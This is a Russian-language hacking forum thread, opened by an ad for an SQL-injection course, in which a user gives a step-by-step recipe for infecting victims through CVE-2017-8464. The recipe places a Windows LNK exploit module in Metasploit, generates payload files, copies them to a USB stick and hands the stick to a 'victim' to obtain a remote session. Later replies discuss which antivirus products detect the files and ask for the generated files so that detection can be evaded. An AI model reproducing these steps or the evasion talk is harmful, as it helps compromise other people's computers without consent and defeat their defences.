• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

/bad USB CVE_2017_8464\ _ # by Ondrik8

Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
Всем привет, смотрю пошла у нас движуха с USB девайсами для заражения жертв, ну думаю "че я лысый?) в трэнде нужно быть!" Правильно?_) Вот и представлю Вашему вниманию очередной способ заражения от меня)
Нам потребуется 5 минут USB - накопитель, Kali-linux и так едем...
Ссылка скрыта от гостей
!

Screenshot_11.png


уязвимые ОС-и

Screenshot_12.png


переименовываем и телепортируем в метасплойт:

Код: 
mv 42382 CVE_2017_8464_LNK_Rce.rb

Код: 
mv CVE_2017_8464_LNK_Rce.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/

запускаем MSF и обновляемся командой: reload_all и...

Screenshot_14.png


exploit -j

далее, настраиваем под себя уязвимость:

Код: 
use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce


Screenshot_15.png


можете еще и порт настроить под себя, жмем: exploit

MSF сгенерит файлы, откроем скрытую папку где они лежат) командой: xdg-open /root/.msf4/local/

перенесем их в нашу злую USB-flash-ку )) и подсунем флэшку "жертве прогресса"!)) Как только "жертва" откроет у себя на компе для просмотра содержимого, у Вас появится заветная сессия!))

Удачи!
 
  • Нравится
Реакции: r0hack, valerian38, Vertigo и ещё 5
M

MrsRobot

спасибо! а как реагируют антивирусники, не тестил? есет будет ругаться?
 
  • Нравится
Реакции: Ondrik8
M

MrsRobot

Ondrik8 сказал(а):
не нетестил с антиками) если есть возможность? отпиши плиз..
Нажмите, чтобы раскрыть...
где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)
 
Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
MrsRobot сказал(а):
где б достать такую редкость как флешка.. ?) неужели ими кто-то пользуется..?_)
а файл же остался у тебя? может на вирустотал закинешь, проверишь? была бы благодарна..)
Нажмите, чтобы раскрыть...
У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)
 
  • Нравится
Реакции: s1rk0 и persivald
M

MrsRobot

IioS сказал(а):
360 total security - палит троян как только флешку втыкнула
Нажмите, чтобы раскрыть...
есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
Ondrik8 сказал(а):
У Вас нету разве простой USB флэшки?)) там много файлов и НЕ НУЖНО на вирус-тотал закидывать что либо !!!!!!!!!!!!! про это уже знают все)
Нажмите, чтобы раскрыть...
ок..сама потестирую будет время
у нас все в облаках
 
Ondrik8

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
MrsRobot сказал(а):
есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках
Нажмите, чтобы раскрыть...
Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей

Ссылка скрыта от гостей
 
persivald

persivald

Green Team
24.07.2017
56
71
BIT
0
MrsRobot сказал(а):
есет интересует.. палит ли?
да, про вирустотал в курсе ( но иной раз некогда тестировать на лабораторной машине
[doublepost=1505503857,1505503779][/doublepost]
ок..сама потестирую будет время
у нас все в облаках
Нажмите, чтобы раскрыть...
есет смарт секьюрити (лицензия) обнаруживает трояна
 
  • Нравится
Реакции: Vertigo и Ondrik8
Д

Дедок

кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.
 
G

gt76g

При подключении флешки произойдет авторан эксплoитa?
 
I

IioS

Дедок сказал(а):
кто может выложите плез файлы которые на флешку подкладываются нет под рукой метасплойта чеб сгенерить, покумекаю мож че как детект сбить.
Нажмите, чтобы раскрыть...
Пагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)
 
Д

Дедок

IioS сказал(а):
Пагади... Там ж под каждый ип отдельны, могу помочь, дай только свой локальный ип(с той сети где будешь тестить)
Нажмите, чтобы раскрыть...
не мне нужно взглянуть на файлы что они из себя представляют для начала
 
Д

Дедок

IioS сказал(а):
держи
Нажмите, чтобы раскрыть...
мне нужны именно ФАЙЛЫ которые на этой картинке ) не скрин ) понять в каком моменте детект идет какой кусок кода или на каком методе палево идет если моя мысль правильная когда я просматривал код экспа то есть идея как сбить, нужно тестнуть в обшем
 
ghost

ghost

Grey Team
12.05.2016
1 636
3 286
BIT
0
Ondrik8 сказал(а):
Девушка.... что хотеть?)

Чето фильм вспомнился "девушка с тату дракона")
Нажмите, чтобы раскрыть...
Хороший фильм
Код: 
msf > -j
[-] Unknown command: -j.
msf >
msf > use exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
[-] Failed to load module: exploit/windows/fileformat/CVE_2017_8464_LNK_Rce
msf >
 
Последнее редактирование:
Для ответа нужно войти/зарегистрироваться
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!

Верх Низ